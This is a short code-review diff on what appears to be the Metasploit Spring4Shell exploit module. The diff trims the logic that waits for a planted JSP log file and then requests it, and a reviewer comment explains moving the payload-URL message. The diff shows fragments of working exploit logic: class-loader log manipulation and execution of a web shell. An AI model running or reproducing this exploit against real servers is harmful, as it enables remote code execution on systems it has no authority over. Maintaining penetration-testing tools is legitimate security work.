modules/exploits/multi/http/spring_framework_rce_spring4shell.rb

```diff
@@ -125,29 +125,24 @@ def modify_class_loader(opts)
         "#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
       }
     })
-
-    sleep(1)
-
-    res
   end
 
   def check_log_file
-
-    jsp_uri = normalize_uri(datastore['PAYLOAD_PATH'], @jsp_file)
-    
     print_status("#{peer} - Waiting for the server to flush the logfile")
-    sleep(5)
-
-    print_status("#{peer} - Executing JSP payload")
-    vprint_status(full_uri(jsp_uri))
-
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri("/#{@jsp_file}")
-    }, 5)
-    
-    fail_with(Failure::UnexpectedReply, "Seems the payload hasn't been written") unless res.code.to_i == 200
-    print_good("#{peer} - Log file flushed at #{jsp_uri}")
+    print_status("#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}")
```

Comment:
Moved the URL up here, so the correct URL is displayed and the user knows that it's used to execute the JSP payload.